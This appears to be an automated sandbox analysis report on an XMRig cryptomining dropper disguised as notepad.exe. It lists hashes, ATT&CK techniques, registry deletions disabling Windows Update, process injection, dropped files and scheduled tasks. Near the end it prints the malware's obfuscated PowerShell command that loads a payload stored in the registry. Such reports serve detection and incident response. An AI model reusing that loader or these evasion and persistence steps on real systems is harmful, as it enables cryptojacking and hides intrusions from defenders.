xmrig | c3031bd36d177c5468c59ef675d13ac9426a973e23df9c7749fb79e98a89bdc1

Analysis

max time kernel
150s
max time network
142s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
11-01-2023 09:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

notepad.exe
Size

4.6MB
MD5

f91a4f2fe37f1008f8f2b0d597dbd5fa
SHA1

3293698ca35076659fbaaac4868ba57afc3e560d
SHA256

c3031bd36d177c5468c59ef675d13ac9426a973e23df9c7749fb79e98a89bdc1
SHA512

64e0815402e0b2fa2dc43b23a129c2aeb1378d589924eec3105617f1da96e00568e59dda87040e4f2c43e74410398f98d007f0fb6be8fe835e2a205b29798bc1
SSDEEP

98304:Ff2WmtHyEOQPBxeasACzue9KtecGu7YRq4AXb6nJXSTH1h+MD+xT:ktHRGasnnu0iXb6ntSWM

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 5072 created 568	5072	powershell.EXE	winlogon.exe
PID 5076 created 3712	5076	svchost.exe	DllHost.exe
PID 5076 created 3920	5076	svchost.exe	DllHost.exe
PID 5092 created 568	5092	powershell.EXE	winlogon.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4212-784-0x000000014036EAC4-mapping.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

notepad.exeNetAdapter.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	notepad.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	NetAdapter.exe

Executes dropped EXE 1 IoCs

Processes:

NetAdapter.exe

pid process

3788 NetAdapter.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4144 takeown.exe
4368 icacls.exe
4760 takeown.exe
1332 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

4144 takeown.exe
4368 icacls.exe
4760 takeown.exe
1332 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

pid	process
3788	NetAdapter.exe

pid	process
4144	takeown.exe
4368	icacls.exe
4760	takeown.exe
1332	icacls.exe

pid	process
4144	takeown.exe
4368	icacls.exe
4760	takeown.exe
1332	icacls.exe

flow	ioc
1	ip-api.com

Drops file in System32 directory 8 IoCs

Processes:

powershell.exeOfficeClickToRun.exeNetAdapter.exepowershell.EXEpowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NetAdapter.exe.log	NetAdapter.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

Processes:

notepad.exepowershell.EXEpowershell.EXENetAdapter.exe

description	pid	process	target process
PID 4544 set thread context of 992	4544	notepad.exe	conhost.exe
PID 5072 set thread context of 1792	5072	powershell.EXE	dllhost.exe
PID 5092 set thread context of 4016	5092	powershell.EXE	dllhost.exe
PID 3788 set thread context of 4212	3788	NetAdapter.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

powershell.exeNetAdapter.exe

description	ioc	process
File created	C:\Program Files\Microsoft\Network\Connections\NetAdapter.exe	powershell.exe
File opened for modification	C:\Program Files\Microsoft\Network\Connections\NetAdapter.exe	powershell.exe
File created	C:\Program Files\Google\Libs\WR64.sys	NetAdapter.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4232 sc.exe
4588 sc.exe
788 sc.exe
796 sc.exe
3632 sc.exe
4832 sc.exe
4544 sc.exe
3064 sc.exe
5104 sc.exe
4416 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1464 3920 WerFault.exe DllHost.exe
532 3712 WerFault.exe DllHost.exe

pid	process
4232	sc.exe
4588	sc.exe
788	sc.exe
796	sc.exe
3632	sc.exe
4832	sc.exe
4544	sc.exe
3064	sc.exe
5104	sc.exe
4416	sc.exe

pid	pid_target	process	target process
1464	3920	WerFault.exe	DllHost.exe
532	3712	WerFault.exe	DllHost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.exeOfficeClickToRun.exeNetAdapter.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	NetAdapter.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 11 Jan 2023 09:24:31 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
2280	reg.exe
1616	reg.exe
4396	reg.exe
4036	reg.exe
3168	reg.exe
4432	reg.exe
656	reg.exe
876	reg.exe
2288	reg.exe
832	reg.exe
4844	reg.exe
4900	reg.exe
1016	reg.exe
4424	reg.exe
4800	reg.exe
1504	reg.exe
2132	reg.exe
2228	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exenotepad.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEWerFault.exeWerFault.exe

pid	process
4896	powershell.exe
4896	powershell.exe
4896	powershell.exe
4544	notepad.exe
3040	powershell.exe
3040	powershell.exe
3040	powershell.exe
5072	powershell.EXE
5072	powershell.EXE
5072	powershell.EXE
5072	powershell.EXE
1792	dllhost.exe
1792	dllhost.exe
5092	powershell.EXE
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
5092	powershell.EXE
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1792	dllhost.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
1464	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe
532	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3052 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

636

pid	process
3052	Explorer.EXE

pid	process
636

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exenotepad.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeIncreaseQuotaPrivilege	4896	powershell.exe
Token: SeSecurityPrivilege	4896	powershell.exe
Token: SeTakeOwnershipPrivilege	4896	powershell.exe
Token: SeLoadDriverPrivilege	4896	powershell.exe
Token: SeSystemProfilePrivilege	4896	powershell.exe
Token: SeSystemtimePrivilege	4896	powershell.exe
Token: SeProfSingleProcessPrivilege	4896	powershell.exe
Token: SeIncBasePriorityPrivilege	4896	powershell.exe
Token: SeCreatePagefilePrivilege	4896	powershell.exe
Token: SeBackupPrivilege	4896	powershell.exe
Token: SeRestorePrivilege	4896	powershell.exe
Token: SeShutdownPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeSystemEnvironmentPrivilege	4896	powershell.exe
Token: SeRemoteShutdownPrivilege	4896	powershell.exe
Token: SeUndockPrivilege	4896	powershell.exe
Token: SeManageVolumePrivilege	4896	powershell.exe
Token: 33	4896	powershell.exe
Token: 34	4896	powershell.exe
Token: 35	4896	powershell.exe
Token: 36	4896	powershell.exe
Token: SeShutdownPrivilege	4408	powercfg.exe
Token: SeCreatePagefilePrivilege	4408	powercfg.exe
Token: SeDebugPrivilege	4544	notepad.exe
Token: SeShutdownPrivilege	3384	powercfg.exe
Token: SeCreatePagefilePrivilege	3384	powercfg.exe
Token: SeShutdownPrivilege	4848	powercfg.exe
Token: SeCreatePagefilePrivilege	4848	powercfg.exe
Token: SeShutdownPrivilege	4964	powercfg.exe
Token: SeCreatePagefilePrivilege	4964	powercfg.exe
Token: SeTakeOwnershipPrivilege	4144	takeown.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	5072	powershell.EXE
Token: SeIncreaseQuotaPrivilege	3040	powershell.exe
Token: SeSecurityPrivilege	3040	powershell.exe
Token: SeTakeOwnershipPrivilege	3040	powershell.exe
Token: SeLoadDriverPrivilege	3040	powershell.exe
Token: SeSystemProfilePrivilege	3040	powershell.exe
Token: SeSystemtimePrivilege	3040	powershell.exe
Token: SeProfSingleProcessPrivilege	3040	powershell.exe
Token: SeIncBasePriorityPrivilege	3040	powershell.exe
Token: SeCreatePagefilePrivilege	3040	powershell.exe
Token: SeBackupPrivilege	3040	powershell.exe
Token: SeRestorePrivilege	3040	powershell.exe
Token: SeShutdownPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeSystemEnvironmentPrivilege	3040	powershell.exe
Token: SeRemoteShutdownPrivilege	3040	powershell.exe
Token: SeUndockPrivilege	3040	powershell.exe
Token: SeManageVolumePrivilege	3040	powershell.exe
Token: 33	3040	powershell.exe
Token: 34	3040	powershell.exe
Token: 35	3040	powershell.exe
Token: 36	3040	powershell.exe
Token: SeIncreaseQuotaPrivilege	3040	powershell.exe
Token: SeSecurityPrivilege	3040	powershell.exe
Token: SeTakeOwnershipPrivilege	3040	powershell.exe
Token: SeLoadDriverPrivilege	3040	powershell.exe
Token: SeSystemProfilePrivilege	3040	powershell.exe
Token: SeSystemtimePrivilege	3040	powershell.exe
Token: SeProfSingleProcessPrivilege	3040	powershell.exe
Token: SeIncBasePriorityPrivilege	3040	powershell.exe
Token: SeCreatePagefilePrivilege	3040	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwm.exe

pid process

1000 dwm.exe
1000 dwm.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Conhost.exe

pid process

2036 Conhost.exe

pid	process
1000	dwm.exe
1000	dwm.exe

pid	process
2036	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

notepad.execmd.execmd.exe

description	pid	process	target process
PID 4544 wrote to memory of 4896	4544	notepad.exe	powershell.exe
PID 4544 wrote to memory of 4896	4544	notepad.exe	powershell.exe
PID 4544 wrote to memory of 4940	4544	notepad.exe	cmd.exe
PID 4544 wrote to memory of 4940	4544	notepad.exe	cmd.exe
PID 4544 wrote to memory of 1540	4544	notepad.exe	cmd.exe
PID 4544 wrote to memory of 1540	4544	notepad.exe	cmd.exe
PID 1540 wrote to memory of 4408	1540	cmd.exe	powercfg.exe
PID 1540 wrote to memory of 4408	1540	cmd.exe	powercfg.exe
PID 4940 wrote to memory of 4232	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 4232	4940	cmd.exe	sc.exe
PID 1540 wrote to memory of 3384	1540	cmd.exe	powercfg.exe
PID 1540 wrote to memory of 3384	1540	cmd.exe	powercfg.exe
PID 4940 wrote to memory of 4588	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 4588	4940	cmd.exe	sc.exe
PID 1540 wrote to memory of 4848	1540	cmd.exe	powercfg.exe
PID 1540 wrote to memory of 4848	1540	cmd.exe	powercfg.exe
PID 4940 wrote to memory of 5104	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 5104	4940	cmd.exe	sc.exe
PID 1540 wrote to memory of 4964	1540	cmd.exe	powercfg.exe
PID 1540 wrote to memory of 4964	1540	cmd.exe	powercfg.exe
PID 4940 wrote to memory of 788	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 788	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 796	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 796	4940	cmd.exe	sc.exe
PID 4940 wrote to memory of 832	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 832	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 3168	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 3168	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 4844	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 4844	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 2280	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 2280	4940	cmd.exe	reg.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4544 wrote to memory of 992	4544	notepad.exe	conhost.exe
PID 4940 wrote to memory of 1616	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 1616	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 4144	4940	cmd.exe	takeown.exe
PID 4940 wrote to memory of 4144	4940	cmd.exe	takeown.exe
PID 4940 wrote to memory of 4368	4940	cmd.exe	icacls.exe
PID 4940 wrote to memory of 4368	4940	cmd.exe	icacls.exe
PID 4544 wrote to memory of 3040	4544	notepad.exe	powershell.exe
PID 4544 wrote to memory of 3040	4544	notepad.exe	powershell.exe
PID 4940 wrote to memory of 4432	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 4432	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 876	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 876	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 4800	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 4800	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 656	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 656	4940	cmd.exe	reg.exe
PID 4940 wrote to memory of 824	4940	cmd.exe	schtasks.exe
PID 4940 wrote to memory of 824	4940	cmd.exe	schtasks.exe
PID 4940 wrote to memory of 1692	4940	cmd.exe	schtasks.exe
PID 4940 wrote to memory of 1692	4940	cmd.exe	schtasks.exe
PID 4940 wrote to memory of 1500	4940	cmd.exe	schtasks.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:644

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:568

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:1000

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d460a470-9ae0-49ad-9c16-92f8682a4fd6}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1792

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{a1ac9cc2-b634-4d85-961f-6b9bfec4775f}
2⤵
PID:4016

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1040

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5092

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
